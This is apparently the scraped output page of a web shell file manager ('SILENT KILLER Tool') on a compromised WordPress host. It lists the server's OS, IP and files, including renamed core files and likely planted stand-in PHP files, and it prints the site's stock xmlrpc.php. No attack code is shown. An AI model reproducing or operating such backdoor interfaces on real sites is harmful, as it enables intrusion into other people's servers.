Current Path: > home > > branxxtp > credithike.com
Operation : Linux premium107.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 198.54.126.246 | Your IP: 216.73.216.181 Domains : 1034 Domain(s) Permission : [ 0555 ]
| Name | Type | Size | Last Modified | Actions |
|---|---|---|---|---|
| a0583 | Directory | - | - | |
| cgi-bin__4eb7b79 | Directory | - | - | |
| ght | Directory | - | - | |
| wp-admin__4eb7b79 | Directory | - | - | |
| wp-content | Directory | - | - | |
| wp-content__4eb7b79 | Directory | - | - | |
| wp-includes__4eb7b79 | Directory | - | - | |
| .htaccess | File | 1156 bytes | December 10 2023 01:02:50. | |
| 403.php | File | 264 bytes | January 29 2026 14:49:58. | |
| admin.php | File | 5361 bytes | February 11 2026 05:58:24. | |
| buy.php | File | 1478 bytes | February 20 2024 01:02:50. | |
| config.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| configuration.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| error_log | File | 2301 bytes | February 06 2026 06:25:05. | |
| index.htm0 | File | 1104 bytes | December 27 2023 01:02:48. | |
| index.html0 | File | 1104 bytes | December 27 2023 01:02:48. | |
| index.php | File | 13760 bytes | August 18 2023 01:02:50. | |
| inputs.php | File | 127 bytes | February 07 2026 20:08:52. | |
| main.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| php.ini | File | 40 bytes | February 09 2026 14:13:04. | |
| robots.txt | File | 367 bytes | August 29 2023 01:02:50. | |
| unsubscribe.php | File | 6268 bytes | February 09 2026 04:55:05. | |
| wp-activate.php__4eb7b79 | File | 7349 bytes | December 03 2025 05:53:14. | |
| wp-blog-header.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| wp-blog-header.php__4eb7b79 | File | 287 bytes | January 08 2026 02:33:34. | |
| wp-config.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| wp-config.php__4eb7b79 | File | 10526 bytes | January 04 2026 22:45:58. | |
| wp-links-opml.php__4eb7b79 | File | 2493 bytes | December 03 2025 05:53:11. | |
| wp-load.php__4eb7b79 | File | 3937 bytes | December 03 2025 05:53:11. | |
| wp-login.php__4eb7b79 | File | 51437 bytes | December 03 2025 05:53:11. | |
| wp-mail.php__4eb7b79 | File | 8727 bytes | December 03 2025 05:53:11. | |
| wp-settings.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| wp-settings.php__4eb7b79 | File | 31055 bytes | December 03 2025 05:53:14. | |
| wp-signup.php__4eb7b79 | File | 34516 bytes | April 15 2025 17:50:20. | |
| xmlrpc.php__4eb7b79 | File | 3205 bytes | April 15 2025 17:50:16. |
<?php
/**
* XML-RPC protocol support for WordPress
*
* @package WordPress
*/
/**
* Whether this is an XML-RPC Request.
*
* @var bool
*/
define( 'XMLRPC_REQUEST', true );
// Discard unneeded cookies sent by some browser-embedded clients.
$_COOKIE = array();
// $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0.
// phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved
if ( ! isset( $HTTP_RAW_POST_DATA ) ) {
$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}
// Fix for mozBlog and other cases where '<?xml' isn't on the very first line.
$HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA );
// phpcs:enable
/** Include the bootstrap for setting up WordPress environment */
require_once __DIR__ . '/wp-load.php';
if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html
header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>';
?>
<rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
<service>
<engineName>WordPress</engineName>
<engineLink>https://wordpress.org/</engineLink>
<homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink>
<apis>
<api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
<api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
<api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
<api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
<?php
/**
* Fires when adding APIs to the Really Simple Discovery (RSD) endpoint.
*
* @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html
*
* @since 3.5.0
*/
do_action( 'xmlrpc_rsd_apis' );
?>
</apis>
</service>
</rsd>
<?php
exit;
}
require_once ABSPATH . 'wp-admin/includes/admin.php';
require_once ABSPATH . WPINC . '/class-IXR.php';
require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php';
/**
* Posts submitted via the XML-RPC interface get that title
*
* @name post_default_title
* @var string
*/
$post_default_title = '';
/**
* Filters the class used for handling XML-RPC requests.
*
* @since 3.1.0
*
* @param string $class The name of the XML-RPC server class.
*/
$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' );
$wp_xmlrpc_server = new $wp_xmlrpc_server_class();
// Fire off the request.
$wp_xmlrpc_server->serve_request();
exit;
/**
* logIO() - Writes logging info to a file.
*
* @since 1.2.0
* @deprecated 3.4.0 Use error_log()
* @see error_log()
*
* @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging.
*
* @param string $io Whether input or output.
* @param string $msg Information describing logging reason.
*/
function logIO( $io, $msg ) {
_deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' );
if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) {
error_log( $io . ' - ' . $msg );
}
}
SILENT KILLER Tool